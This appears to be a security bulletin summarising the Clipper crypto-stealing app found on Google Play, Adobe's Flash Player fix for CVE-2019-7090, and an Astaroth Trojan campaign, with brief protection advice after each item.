Clipper Malware

 

 

A malicious app designed to steal cryptocurrency from victims by replacing a wallet address in the phone’s clipboard has been discovered harboring the first “clipper” malware discovered on Google Play, the official Android app store.

Usually cryptocurrency-stealers are found on unsanctioned Android app stores, but researchers with ESET on Friday said that they spotted the malicious app (a fake version of the legitimate MetaMask service) shortly after it had been introduced at the official Android store on Feb. 1. The app has since been removed, but anyone who had already downloaded it remains affected.

Source: ThreatPost

How do you protect yourself?

Proper security measures must be in place to defend against Clipper malware and similar threats. Having proper up-to-date endpoint and firewall security provides a cross-generational blend of threat defense techniques to protect systems from malware.

 

CVE-2019-7090

 

 

Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address one important vulnerability in Adobe Flash Player. Successful exploitation could lead to information disclosure in the context of the current user.

Source: Adobe

How do you protect yourself?

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the latest version:

Product Version Platform Priority Availability
Adobe Flash Player Desktop Runtime 32.0.0.142 Windows, macOS 2 Flash Player Download Center

Flash Player Distribution

Adobe Flash Player for Google Chrome 32.0.0.142 Windows, macOS, Linux, and Chrome OS 2 Google Chrome Releases
Adobe Flash Player for Microsoft Edge and Internet Explorer 11 32.0.0.144 Windows 10 and 8.1 2 Microsoft Security Advisory
Adobe Flash Player Desktop Runtime 32.0.0.142 Linux 3 Flash Player Download Center

 

Astaroth Trojan

 

 

A new Astaroth Trojan campaign targeting Brazil and European countries is currently exploiting the Avast antivirus and security software developed by GAS Tecnologia to steal information and load malicious modules.

According to Cybereason’s Nocturnus team which discovered the new Astaroth strain, just like previous installments, the malware uses “legitimate, built-in Windows OS processes to perform malicious activities and deliver a payload without being detected” but it also makes use “of well-known tools and even antivirus software to expand its capabilities.”

This Astaroth variant is distributed through spam campaigns just like previous versions, and the infection starts with a .7zip archive delivered to the target in the form of an e-mail message attachment or hyperlink. The malicious archive contains a .lnk file which will spawn a wmic.exe process that will “initialize an XSL Script Processing attack.”

Next, the malware connects to a command-and-control (C2) server and exfiltrates information about the infected computer. After downloading the encrypted XSL script to the infected machine, the Trojan will use BITSAdmin to grab a payload from another C2 server, carefully obfuscated as images or files without extensions containing various Astaroth modules.

Source: BleepingComputer

How do you protect yourself?

Proper security measures must be in place to defend against Astaroth Trojan and similar threats. Having proper up-to-date endpoint security provides a cross-generational blend of threat defense techniques to protect systems from malware.